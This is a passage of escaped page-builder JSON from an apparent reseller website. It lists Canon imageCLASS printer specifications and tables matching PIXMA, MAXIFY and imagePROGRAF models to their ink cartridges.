sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td 